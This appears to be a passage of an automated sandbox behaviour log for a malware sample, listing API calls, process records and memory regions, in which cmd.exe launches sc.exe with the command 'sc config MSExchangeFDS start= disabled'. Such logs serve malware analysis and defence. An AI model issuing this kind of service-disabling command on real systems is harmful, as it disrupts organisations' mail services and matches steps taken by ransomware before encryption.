_wcsicmp (_String1="sc", _String2="POPD") returned 3 [0129.990] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0129.990] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0129.990] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0129.990] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0129.990] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0129.990] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0129.990] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0129.990] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0129.990] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0129.990] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0129.990] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0129.990] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0129.990] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0129.990] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0129.990] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0129.991] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0129.991] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0129.991] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0129.991] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0129.991] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0129.991] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0129.991] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0129.991] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0129.991] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0129.991] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0129.991] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0129.991] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0129.991] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0129.991] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0129.991] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0129.991] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0129.991] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0129.991] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0129.991] _wcsicmp (_String1="sc", _String2="START") returned -17 [0129.991] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0129.991] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0129.991] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0129.991] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0129.991] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0129.991] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0129.991] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0129.991] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0129.991] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0129.991] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0129.991] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0129.991] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0129.991] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0129.991] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0129.991] SetErrorMode (uMode=0x0) returned 0x0 [0129.991] SetErrorMode (uMode=0x1) returned 0x0 [0129.991] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x45f05d0, lpFilePart=0x450edc4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450edc4*="Desktop") returned 0x1d [0129.991] SetErrorMode (uMode=0x0) returned 0x1 [0129.992] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0129.992] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.999] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.999] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.999] GetConsoleTitleW (in: lpConsoleTitle=0x450f044, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.999] InitializeProcThreadAttributeList (in: lpAttributeList=0x450ef70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x450ef54 | out: lpAttributeList=0x450ef70, lpSize=0x450ef54) returned 1 [0129.999] UpdateProcThreadAttribute (in: lpAttributeList=0x450ef70, dwFlags=0x0, Attribute=0x60001, lpValue=0x450ef5c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x450ef70, lpPreviousValue=0x0) returned 1 [0129.999] GetStartupInfoW (in: lpStartupInfo=0x450efa8 | out: lpStartupInfo=0x450efa8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.999] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0129.999] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0129.999] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0129.999] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.999] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.000] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.000] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.001] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeFDS start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x450eef8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeFDS start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x450ef44 | out: lpCommandLine="sc config MSExchangeFDS start= disabled", lpProcessInformation=0x450ef44*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xa60, dwThreadId=0xa7c)) returned 1 [0130.007] CloseHandle (hObject=0xa4) returned 1 [0130.007] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.007] GetEnvironmentStringsW () returned 0x45f9f00* [0130.007] FreeEnvironmentStringsA (penv="=") returned 1 [0130.007] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0130.052] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x450eedc | out: lpExitCode=0x450eedc*=0x424) returned 1 [0130.052] CloseHandle (hObject=0xa8) returned 1 [0130.052] _vsnwprintf (in: _Buffer=0x450efc4, _BufferCount=0x13, _Format="%08X", _ArgList=0x450eee4 | out: _Buffer="00000424") returned 8 [0130.052] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0130.052] GetEnvironmentStringsW () returned 0x45fb378* [0130.052] FreeEnvironmentStringsA (penv="=") returned 1 [0130.052] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.053] GetEnvironmentStringsW () returned 0x45fb378* [0130.053] FreeEnvironmentStringsA (penv="=") returned 1 [0130.053] DeleteProcThreadAttributeList (in: lpAttributeList=0x450ef70 | out: lpAttributeList=0x450ef70) [0130.053] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.053] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0130.053] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.053] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0130.053] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.053] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0130.053] SetConsoleInputExeNameW () returned 0x1 [0130.053] GetConsoleOutputCP () returned 0x1b5 [0130.053] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.053] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.054] exit (_Code=1060) Thread: id = 450 os_tid = 0xa5c Process: id = "126" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x665e9000" os_pid = "0xf30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "125" os_parent_pid = "0xf38" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7085 start_va = 0x7f4b2000 end_va = 0x7f4b2fff entry_point = 0x0 region_type = private name = "private_0x000000007f4b2000" filename = "" Region: id = 7086 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7087 start_va = 0xc38b100000 end_va = 0xc38b11ffff entry_point = 0x0 region_type = private name = "private_0x000000c38b100000" filename = "" Region: id = 7088 start_va = 0xc38b120000 end_va = 0xc38b133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c38b120000" filename = "" Region: id = 7089 start_va = 0xc38b140000 end_va = 0xc38b17ffff entry_point = 0x0 region_type = private name = "private_0x000000c38b140000" filename = "" Region: id = 7090 start_va = 0x7df5ff110000 end_va = 0x7ff5ff10ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff110000" filename = "" Region: id = 7091 start_va = 0x7ff6c47e0000 end_va = 0x7ff6c4802fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47e0000" filename = "" Region: id = 7092 start_va = 0x7ff6c4807000 end_va = 0x7ff6c4807fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4807000" filename = "" Region: id = 7093 start_va = 0x7ff6c480e000 end_va = 0x7ff6c480ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c480e000" filename = "" Region: id = 7094 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7095 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7096 start_va = 0xc38b100000 end_va = 0xc38b10ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c38b100000" filename = "" Region: id = 7097 start_va = 0xc38b110000 end_va = 0xc38b116fff entry_point = 0x0 region_type = private name = "private_0x000000c38b110000" filename = "" Region: id = 7098 start_va = 0xc38b180000 end_va = 0xc38b23dfff entry_point = 0xc38b180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7099 start_va = 0xc38b240000 end_va = 0xc38b27ffff entry_point = 0x0 region_type = private name = "private_0x000000c38b240000" filename = "" Region: id = 7100 start_va = 0xc38b280000 end_va = 0xc38b280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c38b280000" filename = "" Region: id = 7101 start_va = 0xc38b290000 end_va = 0xc38b296fff entry_point = 0x0 region_type = private name = "private_0x000000c38b290000" filename = "" Region: id = 7102 start_va = 0xc38b2a0000 end_va = 0xc38b2a0fff entry_point = 0x0 region_type = private name = "private_0x000000c38b2a0000" filename = "" Region: id = 7103 start_va = 0xc38b2b0000 end_va = 0xc38b2b0fff entry_point = 0x0 region_type = private name = "private_0x000000c38b2b0000" filename = "" Region: id = 7104 start_va = 0xc38b2e0000 end_va = 0xc38b3dffff entry_point = 0x0 region_type = private name = "private_0x000000c38b2e0000" filename = "" Region: id = 7105 start_va = 0xc38b3e0000 end_va = 0xc38b567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c38b3e0000" filename = "" Region: id = 7106 start_va = 0xc38b5d0000 end_va = 0xc38b5dffff entry_point = 0x0 region_type = private name = "private_0x000000c38b5d0000" filename = "" Region: id = 7107 start_va = 0xc38b5e0000 end_va = 0xc38b760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c38b5e0000" filename = "" Region: id = 7108 start_va = 0xc38b770000 end_va = 0xc38cb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c38b770000" filename = "" Region: id = 7109 start_va = 0x7ff6c46e0000 end_va = 0x7ff6c47dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c46e0000" filename = "" Region: id = 7110 start_va = 0x7ff6c480c000 end_va = 0x7ff6c480dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c480c000" filename = "" Region: id = 7111 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7112 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7113 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7114 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7115 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7116 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7117 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7118 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7119 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7120 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7121 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7122 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7123 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7124 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 447 os_tid = 0xf60 Thread: id = 448 os_tid = 0xf28 Thread: id = 449 os_tid = 0xa78 Process: id = "127" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x33c24000" os_pid = "0xa60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "125" os_parent_pid = "0xf38" cmd_line = "sc config MSExchangeFDS start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7138 start_va = 0xdf0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 7139 start_va = 0xe10000 end_va = 0xe11fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 7140 start_va = 0xe20000 end_va = 0xe33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 7141 start_va = 0xe40000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 7142 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7143 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7144 start_va = 0x4ea0000 end_va = 0x4edffff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 7145 start_va = 0x4ee0000 end_va = 0x4ee3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ee0000" filename = "" Region: id = 7146 start_va = 0x4ef0000 end_va = 0x4ef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ef0000" filename = "" Region: id = 7147 start_va = 0x4f00000 end_va = 0x4f01fff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 7148 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7149 start_va = 0x7e7b0000 end_va = 0x7e7d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7b0000" filename = "" Region: id = 7150 start_va = 0x7e7d9000 end_va = 0x7e7d9fff entry_point = 0x0 region_type = private name = "private_0x000000007e7d9000" filename = "" Region: id = 7151 start_va = 0x7e7db000 end_va = 0x7e7dbfff entry_point = 0x0 region_type = private name = "private_0x000000007e7db000" filename = "" Region: id = 7152 start_va = 0x7e7dd000 end_va = 0x7e7dffff entry_point = 0x0 region_type = private name = "private_0x000000007e7dd000" filename = "" Region: id = 7153 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7154 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7155 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7156 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7157 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7158 start_va = 0x4f40000 end_va = 0x4f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 7159 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7160 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7161 start_va = 0x50f0000 end_va = 0x51effff entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 7162 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7163 start_va = 0xdf0000 end_va = 0xdfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 7164 start_va = 0xe00000 end_va = 0xe03fff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 7165 start_va = 0x4f50000 end_va = 0x500dfff entry_point = 0x4f50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7166 start_va = 0x5010000 end_va = 0x504ffff entry_point = 0x0 region_type = private name = "private_0x0000000005010000" filename = "" Region: id = 7167 start_va = 0x5050000 end_va = 0x508ffff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 7168 start_va = 0x5380000 end_va = 0x538ffff entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 7169 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7170 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7171 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7172 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7173 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7174 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7175 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7176 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: 